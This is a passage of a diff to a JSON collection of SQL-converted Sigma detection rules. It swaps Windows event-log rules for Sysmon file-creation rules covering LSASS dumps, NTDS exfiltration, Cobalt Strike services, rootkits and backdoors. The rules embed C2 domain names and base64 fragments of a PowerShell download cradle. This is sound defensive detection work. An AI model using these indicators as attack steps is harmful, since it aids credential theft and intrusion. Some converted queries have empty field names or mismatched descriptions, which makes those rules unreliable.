ProcessNameBuffer LIKE '%\\\\slack.exe' ESCAPE '\\' AND RequestedPolicy = '8' AND ValidatedPolicy = '1') OR ((FileNameBuffer LIKE '%\\\\Mozilla Firefox\\\\mozavcodec.dll' ESCAPE '\\' OR FileNameBuffer LIKE '%\\\\Mozilla Firefox\\\\mozavutil.dll' ESCAPE '\\') AND ProcessNameBuffer LIKE '%\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' AND RequestedPolicy = '8') OR ((FileNameBuffer LIKE '%\\\\Program Files\\\\Avast Software\\\\Avast\\\\aswAMSI.dll' ESCAPE '\\' OR FileNameBuffer LIKE '%\\\\Program Files (x86)\\\\Avast Software\\\\Avast\\\\aswAMSI.dll' ESCAPE '\\') AND RequestedPolicy IN ('8', '12') AND ValidatedPolicy = '1') OR ((FileNameBuffer LIKE '%\\\\stdole.dll' ESCAPE '\\' OR FileNameBuffer LIKE '%\\\\msdatasrc.dll' ESCAPE '\\' OR FileNameBuffer LIKE '%\\\\adodb.dll' ESCAPE '\\') AND ProcessNameBuffer LIKE '%\\\\mscorsvw.exe' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\Windows\\\\Microsoft.NET\\\\%' ESCAPE '\\' AND RequestedPolicy = '8' AND ValidatedPolicy = '2') OR (FileNameBuffer LIKE '%\\\\Program Files\\\\Google\\\\Drive File Stream\\\\%' ESCAPE '\\' AND FileNameBuffer LIKE '%\\\\crashpad\\_handler.exe' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe' ESCAPE '\\' AND RequestedPolicy = '8' AND ValidatedPolicy = '1')))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\Oracle\\\\bin\\\\java%' ESCAPE '\\' AND TargetFilename LIKE '%.exe%' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\Retrive%' ESCAPE '\\' AND TargetFilename LIKE '%.vbs%' ESCAPE '\\')))" ], - "filename": "win_codeintegrity_attempted_dll_load.yml" + "filename": "file_event_win_mal_adwind.yml" }, { - "title": "Code Integrity Blocked Driver Load", - "id": "e4be5675-4a53-426a-8c81-a8bb2387e947", - "description": "Detects blocked load events that did not meet the authenticode signing level requirements or violated code integrity policy", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "status": "experimental", + "title": "NPPSpy Hacktool Usage", + "id": "cad1fe90-2406-44dc-bd03-59d0b58fe722", + "status": "test", + "description": "Detects the use of NPPSpy hacktool that stores cleartext passwords of users that logged in to a local file", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1543" + "attack.credential_access" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-CodeIntegrity/Operational' AND EventID = '3077')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%\\\\NPPSpy.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\NPPSpy.dll' ESCAPE '\\'))" ], - "filename": "win_codeintegrity_blocked_driver_load.yml" + "filename": "file_event_win_hktl_nppspy.yml" }, { - "title": "GALLIUM Artefacts - Builtin", - "id": "3db10f25-2527-4b79-8d4b-471eb900ee29", + "title": "LSASS Memory Dump File Creation", + "id": "5e3d3601-0662-4af0-b1d2-36a05e90c40a", "status": "test", - "description": "Detects artefacts associated with activity group GALLIUM - Microsoft Threat Intelligence Center indicators released in December 2019.", - "author": "Tim Burrell", + "description": "LSASS memory dump creation using operating systems utilities. Procdump will use process name in output file if no name is specified", + "author": "Teymur Kheirkhabarov, oscd.community", "tags": [ "attack.credential_access", - "attack.command_and_control", - "attack.t1071" + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Dumping lsass memory for forensic investigation purposes by legitimate incident responder or forensic invetigator", + "Dumps of another process that contains lsass in its process name (substring)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '257' AND QNAME IN ('asyspy256.ddns.net', 'hotkillmail9sddcc.ddns.net', 'rosaf112.ddns.net', 'cvdfhjh1231.myftp.biz', 'sz2016rose.ddns.net', 'dffwescwer4325.myftp.biz', 'cvdfhjh1231.ddns.net'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%lsass%' ESCAPE '\\' AND TargetFilename LIKE '%dmp' ESCAPE '\\')" ], - "filename": "win_dns_analytic_apt_gallium.yml" + "filename": "file_event_win_lsass_memory_dump_file_creation.yml" }, { - "title": "Remove Exported Mailbox from Exchange Webserver", - "id": "09570ae5-889e-43ea-aac0-0e1221fb3d95", + "title": "Suspicious MSExchangeMailboxReplication ASPX Write", + "id": "7280c9f3-a5af-45d0-916a-bc01cb4151c9", "status": "test", - "description": "Detects removal of an exported Exchange mailbox which could be to cover tracks from ProxyShell exploit", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects suspicious activity in which the MSExchangeMailboxReplication process writes .asp and .apsx files to disk, which could be a sign of ProxyShell exploitation", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1070" + "attack.initial_access", + "attack.t1190", + "attack.persistence", + "attack.t1505.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'MSExchange Management' AND = 'Remove-MailboxExportRequest' AND = ' -Identity ' AND = ' -Confirm \"False\"')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\MSExchangeMailboxReplication.exe' ESCAPE '\\' AND (TargetFilename LIKE '%.aspx' ESCAPE '\\' OR TargetFilename LIKE '%.asp' ESCAPE '\\'))" ], - "filename": "win_exchange_proxyshell_remove_mailbox_export.yml" + "filename": "file_event_win_susp_exchange_aspx_write.yml" }, { - "title": "Possible Exploitation of Exchange RCE CVE-2021-42321", - "id": "c92f1896-d1d2-43c3-92d5-7a5b35c217bb", + "title": "Legitimate Application Dropped Archive", + "id": "654fcc6d-840d-4844-9b07-2c3300e54a26", "status": "experimental", - "description": "Detects log entries that appear in exploitation attempts against MS Exchange RCE CVE-2021-42321", - "author": "Florian Roth (Nextron Systems), @testanull", + "description": "Detects programs on a Windows system that should not write an archive to disk", + "author": "frack113, Florian Roth", "tags": [ - "attack.lateral_movement", - "attack.t1210" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Unknown, please report false positives via https://github.com/SigmaHQ/sigma/issues" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'MSExchange Management' AND EventID IN ('6', '8') AND (Data LIKE '%Cmdlet failed. Cmdlet Get-App, %' ESCAPE '\\' OR Data LIKE '%Task Get-App throwing unhandled exception: System.InvalidCastException:%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\winword.exe' ESCAPE '\\' OR Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\msaccess.exe' ESCAPE '\\' OR Image LIKE '%\\\\mspub.exe' ESCAPE '\\' OR Image LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR Image LIKE '%\\\\visio.exe' ESCAPE '\\' OR Image LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR Image LIKE '%\\\\wordview.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\certoc.exe' ESCAPE '\\' OR Image LIKE '%\\\\CertReq.exe' ESCAPE '\\' OR Image LIKE '%\\\\Desktopimgdownldr.exe' ESCAPE '\\' OR Image LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR Image LIKE '%\\\\finger.exe' ESCAPE '\\' OR Image LIKE '%\\\\notepad.exe' ESCAPE '\\' OR Image LIKE '%\\\\AcroRd32.exe' ESCAPE '\\' OR Image LIKE '%\\\\RdrCEF.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.zip' ESCAPE '\\' OR TargetFilename LIKE '%.rar' ESCAPE '\\' OR TargetFilename LIKE '%.7z' ESCAPE '\\' OR TargetFilename LIKE '%.diagcab' ESCAPE '\\' OR TargetFilename LIKE '%.appx' ESCAPE '\\'))" ], - "filename": "win_exchange_cve_2021_42321.yml" + "filename": "file_event_win_legitimate_app_dropping_archive.yml" }, { - "title": "Exchange Set OabVirtualDirectory ExternalUrl Property", - "id": "9db37458-4df2-46a5-95ab-307e7f29e675", + "title": "Pingback Backdoor File Indicators", + "id": "2bd63d53-84d4-4210-80ff-bf0658f1bf78", "status": "test", - "description": "Rule to detect an adversary setting OabVirtualDirectory External URL property to a script in Exchange Management log", - "author": "Jose Rodriguez @Cyb3rPandaH", + "description": "Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report", + "author": "Bhabesh Raj", "tags": [ "attack.persistence", - "attack.t1505.003" + "attack.t1574.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'MSExchange Management' AND = 'Set-OabVirtualDirectory' AND = 'ExternalUrl' AND LIKE 'Page\\_Load' ESCAPE '\\' AND = 'script')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%updata.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Windows\\\\oci.dll' ESCAPE '\\')" ], - "filename": "win_exchange_set_oabvirtualdirectory_externalurl.yml" + "filename": "file_event_win_malware_pingback_backdoor.yml" }, { - "title": "Failed MSExchange Transport Agent Installation", - "id": "c7d16cae-aaf3-42e5-9c1c-fb8553faa6fa", + "title": "Windows Shell/Scripting Application File Write to Suspicious Folder", + "id": "1277f594-a7d1-4f28-a2d3-73af5cbeab43", "status": "experimental", - "description": "Detects a failed installation of a Exchange Transport Agent", - "author": "Tobias Michalski (Nextron Systems)", - "tags": [ - "attack.persistence", - "attack.t1505.002" - ], + "description": "Detects Windows shells and scripting applications that write files to suspicious folders", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Legitimate installations of exchange TransportAgents. AssemblyPath is a good indicator for this." + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'MSExchange Management' AND EventID = '6' AND Data LIKE '%Install-TransportAgent%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\') AND (TargetFilename LIKE 'C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\')) OR ((Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\') AND (TargetFilename LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))))" ], - "filename": "win_exchange_transportagent_failed.yml" + "filename": "file_event_win_shell_write_susp_directory.yml" }, { - "title": "DNS Server Error Failed Loading the ServerLevelPluginDLL", - "id": "cbe51394-cd93-4473-b555-edf0144952d9", + "title": "Suspicious NTDS Exfil Filename Patterns", + "id": "3a8da4e0-36c1-40d2-8b29-b3e890d5172a", "status": "test", - "description": "Detects a DNS server error in which a specified plugin DLL (in registry) could not be loaded", + "description": "Detects suspicious creations of files with names used in various tools that export the NTDS.DIT for exfiltration", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1574.002" + "attack.credential_access", + "attack.t1003.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'DNS Server' AND EventID IN ('150', '770', '771'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%\\\\All.cab' ESCAPE '\\' OR TargetFilename LIKE '%.ntds.cleartext' ESCAPE '\\'))" ], - "filename": "win_dns_server_susp_server_level_plugin_dll.yml" + "filename": "file_event_win_ntds_exfil_tools.yml" }, { - "title": "Suspicious Service Installation Script", - "id": "70f00d10-60b2-4f34-b9a0-dc3df3fe762a", - "status": "experimental", - "description": "Detects suspicious service installation scripts", - "author": "pH-T (Nextron Systems)", + "title": "Powerup Write Hijack DLL", + "id": "602a1f13-c640-4d73-b053-be9a2fa58b96", + "status": "test", + "description": "Powerup tool's Write Hijack DLL exploits DLL hijacking for privilege escalation.\nIn it's default mode, it builds a self deleting .bat file which executes malicious command.\nThe detection rule relies on creation of the malicious bat file (debug.bat by default).\n", + "author": "Subhash Popuri (@pbssubhash)", "tags": [ "attack.persistence", "attack.privilege_escalation", - "car.2013-09-005", - "attack.t1543.003" + "attack.defense_evasion", + "attack.t1574.001" ], "falsepositives": [ - "Unknown" + "Any powershell script that creates bat files" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND (ImagePath LIKE '% /c %' ESCAPE '\\' OR ImagePath LIKE '% /r %' ESCAPE '\\' OR ImagePath LIKE '% /k %' ESCAPE '\\') AND (ImagePath LIKE '%powershell%' ESCAPE '\\' OR ImagePath LIKE '%pwsh%' ESCAPE '\\' OR ImagePath LIKE '%wscript%' ESCAPE '\\' OR ImagePath LIKE '%cscript%' ESCAPE '\\' OR ImagePath LIKE '%mshta%' ESCAPE '\\' OR ImagePath LIKE '%rundll32%' ESCAPE '\\' OR ImagePath LIKE '%regsvr32%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetFilename LIKE '%.bat' ESCAPE '\\')" ], - "filename": "win_system_susp_service_installation_script.yml" + "filename": "file_event_win_hktl_powerup_dllhijacking.yml" }, { - "title": "Local Privilege Escalation Indicator TabTip", - "id": "bc2e25ed-b92b-4daa-b074-b502bdd1982b", + "title": "RDP File Creation From Suspicious Application", + "id": "fccfb43e-09a7-4bd2-8b37-a5a7df33386d", "status": "experimental", - "description": "Detects the invocation of TabTip via CLSID as seen when JuicyPotatoNG is used on a system in brute force mode", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Rclone config file being created", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1557.001" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '10001' AND param1 LIKE 'C:\\\\Program Files\\\\Common Files\\\\microsoft shared\\\\ink\\\\TabTip.exe' ESCAPE '\\' AND param2 = '2147943140' AND param3 = '{054AAE20-4BEA-4347-8A35-64A533254A9D}')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\brave.exe' ESCAPE '\\' OR Image LIKE '%\\\\CCleaner Browser\\\\Application\\\\CCleanerBrowser.exe' ESCAPE '\\' OR Image LIKE '%\\\\chromium.exe' ESCAPE '\\' OR Image LIKE '%\\\\firefox.exe' ESCAPE '\\' OR Image LIKE '%\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR Image LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR Image LIKE '%\\\\microsoftedge.exe' ESCAPE '\\' OR Image LIKE '%\\\\msedge.exe' ESCAPE '\\' OR Image LIKE '%\\\\Opera.exe' ESCAPE '\\' OR Image LIKE '%\\\\Vivaldi.exe' ESCAPE '\\' OR Image LIKE '%\\\\Whale.exe' ESCAPE '\\' OR Image LIKE '%\\\\Outlook.exe' ESCAPE '\\' OR Image LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' OR Image LIKE '%\\\\Thunderbird.exe' ESCAPE '\\' OR Image LIKE '%\\\\Discord.exe' ESCAPE '\\' OR Image LIKE '%\\\\Keybase.exe' ESCAPE '\\' OR Image LIKE '%\\\\msteams.exe' ESCAPE '\\' OR Image LIKE '%\\\\Slack.exe' ESCAPE '\\' OR Image LIKE '%\\\\teams.exe' ESCAPE '\\') AND TargetFilename LIKE '%.rdp%' ESCAPE '\\')" ], - "filename": "win_system_lpe_indicators_tabtip.yml" + "filename": "file_event_win_rdp_file_susp_creation.yml" }, { - "title": "Meterpreter or Cobalt Strike Getsystem Service Installation - System", - "id": "843544a7-56e0-4dcc-a44f-5cc266dd97d6", - "status": "experimental", - "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation", - "author": "Teymur Kheirkhabarov, Ecco, Florian Roth", + "title": "InstallerFileTakeOver LPE CVE-2021-41379 File Create Event", + "id": "3be82d5d-09fe-4d6a-a275-0d40d234d324", + "status": "test", + "description": "Detects signs of the exploitation of LPE CVE-2021-41379 that include an msiexec process that creates an elevation_service.exe file", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.privilege_escalation", - "attack.t1134.001", - "attack.t1134.002" + "attack.t1068" ], "falsepositives": [ - "Highly unlikely" + "Unknown", + "Possibly some Microsoft Edge upgrades" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND ((ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%/c%' ESCAPE '\\' AND ImagePath LIKE '%echo%' ESCAPE '\\' AND ImagePath LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ImagePath LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND ImagePath LIKE '%/c%' ESCAPE '\\' AND ImagePath LIKE '%echo%' ESCAPE '\\' AND ImagePath LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ImagePath LIKE '%cmd.exe%' ESCAPE '\\' AND ImagePath LIKE '%/c%' ESCAPE '\\' AND ImagePath LIKE '%echo%' ESCAPE '\\' AND ImagePath LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ImagePath LIKE '%rundll32%' ESCAPE '\\' AND ImagePath LIKE '%.dll,a%' ESCAPE '\\' AND ImagePath LIKE '%/p:%' ESCAPE '\\') OR ImagePath LIKE '\\\\\\\\127.0.0.1\\\\ADMIN$\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\elevation\\_service.exe' ESCAPE '\\')" ], - "filename": "win_system_meterpreter_or_cobaltstrike_getsystem_service_installation.yml" + "filename": "file_event_win_cve_2021_41379_msi_lpe.yml" }, { - "title": "KrbRelayUp Service Installation", - "id": "e97d9903-53b2-41fc-8cb9-889ed4093e80", - "status": "experimental", - "description": "Detects service creation from KrbRelayUp tool used for privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings)", - "author": "Sittikorn S, Tim Shelton", + "title": "Moriya Rootkit", + "id": "a1507d71-0b60-44f6-b17c-bf53220fdd88", + "status": "test", + "description": "Detects the use of Moriya rootkit as described in the securelist's Operation TunnelSnake report", + "author": "Bhabesh Raj", "tags": [ + "attack.persistence", "attack.privilege_escalation", - "attack.t1543" + "attack.t1543.003" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '7045' AND ServiceName = 'KrbSCM')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\drivers\\\\MoriyaStreamWatchmen.sys' ESCAPE '\\')" ], - "filename": "win_system_krbrelayup_service_installation.yml" + "filename": "file_event_win_moriya_rootkit.yml" }, { - "title": "NTFS Vulnerability Exploitation", - "id": "f14719ce-d3ab-4e25-9ce6-2899092260b0", - "status": "test", - "description": "This the exploitation of a NTFS vulnerability as reported without many details via Twitter", + "title": "CrackMapExec File Creation Patterns", + "id": "9433ff9c-5d3f-4269-99f8-95fc826ea489", + "status": "experimental", + "description": "Detects suspicious file creation patterns found in logs when CrackMapExec is used", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1499.001" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Ntfs' AND EventID = '55' AND Origin = 'File System Driver' AND Description LIKE '%contains a corrupted file record%' ESCAPE '\\' AND Description LIKE '%The name of the file is \"\\\\\"%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\rundll32.exe' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND (TargetFilename LIKE '%.rtf' ESCAPE '\\' OR TargetFilename LIKE '%.otf' ESCAPE '\\' OR TargetFilename LIKE '%.odt' ESCAPE '\\' OR TargetFilename LIKE '%.txt' ESCAPE '\\' OR TargetFilename LIKE '%.doc' ESCAPE '\\' OR TargetFilename LIKE '%.pdf' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.docx' ESCAPE '\\' OR TargetFilename LIKE '%.wpd' ESCAPE '\\' OR TargetFilename LIKE '%.icns' ESCAPE '\\' OR TargetFilename LIKE '%.db' ESCAPE '\\' OR TargetFilename LIKE '%.ini' ESCAPE '\\' OR TargetFilename LIKE '%.tex' ESCAPE '\\' OR TargetFilename LIKE '%.sys' ESCAPE '\\' OR TargetFilename LIKE '%.csv' ESCAPE '\\' OR TargetFilename LIKE '%.fon' ESCAPE '\\' OR TargetFilename LIKE '%.tar' ESCAPE '\\' OR TargetFilename LIKE '%.ttf' ESCAPE '\\' OR TargetFilename LIKE '%.xml' ESCAPE '\\' OR TargetFilename LIKE '%.cfg' ESCAPE '\\' OR TargetFilename LIKE '%.cpl' ESCAPE '\\' OR TargetFilename LIKE '%.jpg' ESCAPE '\\' OR TargetFilename LIKE '%.drv' ESCAPE '\\' OR TargetFilename LIKE '%.cur' ESCAPE '\\' OR TargetFilename LIKE '%.tmp' ESCAPE '\\')) OR (TargetFilename LIKE 'C:\\\\Windows\\\\Temp\\\\procdump.exe' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\'))))" ], - "filename": "win_system_ntfs_vuln_exploit.yml" + "filename": "file_event_win_crackmapexec_patterns.yml" }, { - "title": "CobaltStrike Service Installations - System", - "id": "5a105d34-05fc-401e-8553-272b45c1522d", + "title": "Files With System Process Name In Unsuspected Locations", + "id": "d5866ddf-ce8f-4aea-b28e-d96485a20d3d", "status": "test", - "description": "Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement", - "author": "Florian Roth (Nextron Systems), Wojciech Lesicki", + "description": "Detects the creation of an executable with a system process name in folders other than the system ones (System32, SysWOW64...etc).", + "author": "Sander Wiebing, Tim Shelton, Nasreddine Bencherchali", "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.lateral_movement", - "attack.t1021.002", - "attack.t1543.003", - "attack.t1569.002" + "attack.defense_evasion", + "attack.t1036.005" ], "falsepositives": [ - "Unknown" + "System processes copied outside their default folders for testing purposes", + "Third party software naming their software with the same names as the processes mentioned here" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND ((ImagePath LIKE '%ADMIN$%' ESCAPE '\\' AND ImagePath LIKE '%.exe%' ESCAPE '\\') OR (ImagePath LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND ImagePath LIKE '%start%' ESCAPE '\\' AND ImagePath LIKE '%powershell%' ESCAPE '\\') OR ImagePath LIKE '%powershell -nop -w hidden -encodedcommand%' ESCAPE '\\' OR ImagePath LIKE '%SUVYIChOZXctT2JqZWN0IE5ldC5XZWJjbGllbnQpLkRvd25sb2FkU3RyaW5nKCdodHRwOi8vMTI3LjAuMC4xO%' ESCAPE '\\' OR ImagePath LIKE '%lFWCAoTmV3LU9iamVjdCBOZXQuV2ViY2xpZW50KS5Eb3dubG9hZFN0cmluZygnaHR0cDovLzEyNy4wLjAuMT%' ESCAPE '\\' OR ImagePath LIKE '%JRVggKE5ldy1PYmplY3QgTmV0LldlYmNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHA6Ly8xMjcuMC4wLjE6%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%\\\\AtBroker.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\audiodg.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\backgroundTaskHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\cmdl32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\conhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\csrss.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\dasHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\dfrgui.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\dwm.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\eventcreate.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\eventvwr.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\explorer.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\extrac32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\fontdrvhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ipconfig.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\iscsicli.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\iscsicpl.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\logman.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\LogonUI.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\LsaIso.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsass.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsm.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\msinfo32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\mstsc.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\nbtstat.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\odbcconf.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\powershell.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\regini.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SearchFilterHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SearchIndexer.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SearchProtocolHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SecurityHealthService.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SecurityHealthSystray.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\services.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ShellAppRuntime.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sihost.exe' ESCAPE '\\' OR 